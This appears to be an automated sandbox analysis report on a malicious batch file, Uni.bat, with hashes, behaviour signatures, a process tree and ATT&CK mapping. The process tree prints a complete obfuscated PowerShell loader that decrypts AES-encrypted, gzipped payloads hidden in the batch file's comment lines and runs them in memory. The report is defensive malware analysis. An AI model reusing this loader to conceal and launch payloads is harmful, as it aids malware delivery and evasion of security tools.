Analysis

  • max time kernel
    120s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240215-en
  • resource tags

    arch:x64arch:x86image:win7-20240215-enlocale:en-usos:windows7-x64system
  • submitted
    11-05-2024 11:55

General

  • Target

    Uni.bat

  • Size

    512KB

  • MD5

    d188d8d8e859b13330551005efc1f6cb

  • SHA1

    6e3e2c19174c7cd0e9a2c248c700cd25a7ee17da

  • SHA256

    7de9346c81bcb5b91230450e2092f27851f5cffb1837058e611ac103974f680a

  • SHA512

    1847acf391c3d7a21962ae19908af637f239edaab741d2c7dc9e876b04dea6f54b7d9d42ebf3634fff9283692b7ecb566e067368a77e618bb8b5ef402e33e59f

  • SSDEEP

    12288:i7ET3QCkmortzhYOPdMa0cqLepCUBD5LSWjU2d:GY3QCk7hXdMaELkVjU2d

Score
3/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\Uni.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1752
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lV00YZkMqK2WikDyAFyEbHtVHlk19tlqai4+2KYGz1A='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ohwcqqva4JCO7DLoEbGU5A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $VRfwB=New-Object System.IO.MemoryStream(,$param_var); $vPQnJ=New-Object System.IO.MemoryStream; $UUurH=New-Object System.IO.Compression.GZipStream($VRfwB, [IO.Compression.CompressionMode]::Decompress); $UUurH.CopyTo($vPQnJ); $UUurH.Dispose(); $VRfwB.Dispose(); $vPQnJ.Dispose(); $vPQnJ.ToArray();}function execute_function($param_var,$param2_var){ $HBxgS=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $KZtfv=$HBxgS.EntryPoint; $KZtfv.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Uni.bat';$gmyEL=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Uni.bat').Split([Environment]::NewLine);foreach ($fSioa in $gmyEL) { if ($fSioa.StartsWith(':: ')) { $llpNM=$fSioa.Substring(3); break; }}$payloads_var=[string[]]$llpNM.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2256

Network

MITRE ATT&CK Matrix ATT&CK v13

Execution

Command and Scripting Interpreter

1
T1059

PowerShell

1
T1059.001

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2256-2-0x0000000073F21000-0x0000000073F22000-memory.dmp
    Filesize

    4KB

  • memory/2256-3-0x0000000073F20000-0x00000000744CB000-memory.dmp
    Filesize

    5.7MB

  • memory/2256-4-0x0000000073F20000-0x00000000744CB000-memory.dmp
    Filesize

    5.7MB

  • memory/2256-5-0x0000000073F20000-0x00000000744CB000-memory.dmp
    Filesize

    5.7MB

  • memory/2256-6-0x0000000073F20000-0x00000000744CB000-memory.dmp
    Filesize

    5.7MB

  • memory/2256-7-0x0000000073F20000-0x00000000744CB000-memory.dmp
    Filesize

    5.7MB